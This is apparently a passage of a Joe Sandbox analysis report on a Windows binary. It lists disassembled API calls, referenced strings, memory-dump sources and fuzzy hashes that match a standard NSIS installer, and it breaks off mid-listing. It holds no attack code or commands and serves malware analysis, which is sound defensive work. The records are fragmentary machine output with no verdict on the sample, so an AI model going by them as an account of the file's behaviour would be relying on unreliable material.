                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                  • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                  • String ID: F$%s=%s$NUL$[Rename]
                                                                                  • API String ID: 565278875-1653569448
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                  • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                  • String ID: F
                                                                                  • API String ID: 941294808-1304234792
                                                                                  APIs
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                  • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                  • API String ID: 1641139501-220328614
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                  Strings
                                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                  • String ID: created uninstaller: %d, "%s"
                                                                                  • API String ID: 3294113728-3145124454
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                  • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                  • API String ID: 3734993849-2769509956
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                  • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                  • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                  • GetSysColor.USER32(?), ref: 00403E2B
                                                                                  • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                  • DeleteObject.GDI32(?), ref: 00403E55
                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                  Similarity
                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2320649405-0
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                  Strings
                                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                  • API String ID: 1033533793-945480824
                                                                                  • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                  • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                  • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                  • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                  • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                  • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                  • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                  • String ID:
                                                                                  • API String ID: 2740478559-0
                                                                                  • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                  • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                  • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                  • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                  APIs
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                    • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                    • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                  Strings
                                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                                  • Exec: command="%s", xrefs: 00402241
                                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                  • API String ID: 2014279497-3433828417
                                                                                  • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                  • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                  • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                  • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                  • GetMessagePos.USER32 ref: 00404871
                                                                                  • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ClientScreen
                                                                                  • String ID: f
                                                                                  • API String ID: 41195575-1993550816
                                                                                  • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                  • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                  • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                  • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                  APIs
                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                  • MulDiv.KERNEL32(0000F000,00000064,?), ref: 00403295
                                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                  Strings
                                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                                  Similarity
                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                  • String ID: verifying installer: %d%%
                                                                                  • API String ID: 1451636040-82062127
                                                                                  • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                  • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                  • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                  • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                  • wsprintfW.USER32 ref: 00404457
                                                                                  • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                  Similarity
                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                  • String ID: %u.%u%s%s$@rD
                                                                                  • API String ID: 3540041739-1813061909
                                                                                  • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                  • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                  • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                  • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                  APIs
                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                  • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                  • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                  Similarity
                                                                                  • API ID: Char$Next$Prev
                                                                                  • String ID: *?|<>/":
                                                                                  • API String ID: 589700163-165019052
                                                                                  • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                  • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                  • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                  • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                  Similarity
                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1912718029-0
                                                                                  • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                  • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                  • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                  • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                  Similarity
                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                  • String ID:
                                                                                  • API String ID: 1849352358-0
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Timeout
                                                                                  • String ID: !
                                                                                  • API String ID: 1777923405-2657877971
                                                                                  APIs
                                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                  • API String ID: 1697273262-1764544995
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 00404902
                                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                  • String ID: $@rD
                                                                                  • API String ID: 3748168415-881980237
                                                                                  APIs
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                    • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                    • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                                  • API String ID: 2577523808-3778932970
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: lstrcatwsprintf
                                                                                  • String ID: %02x%c$...
                                                                                  • API String ID: 3065427908-1057055748
                                                                                  APIs
                                                                                  • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                                  • API String ID: 2266616436-4211696005
                                                                                  APIs
                                                                                  • GetDC.USER32(?), ref: 00402100
                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                  • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                  Similarity
                                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1599320355-0
                                                                                  APIs
                                                                                    • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                  • String ID: Version
                                                                                  • API String ID: 512980652-315105994
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                  • String ID:
                                                                                  • API String ID: 2102729457-0
                                                                                  • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                  • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                  • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                  • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                  • String ID:
                                                                                  • API String ID: 2883127279-0
                                                                                  • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                  • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                  • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                  • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
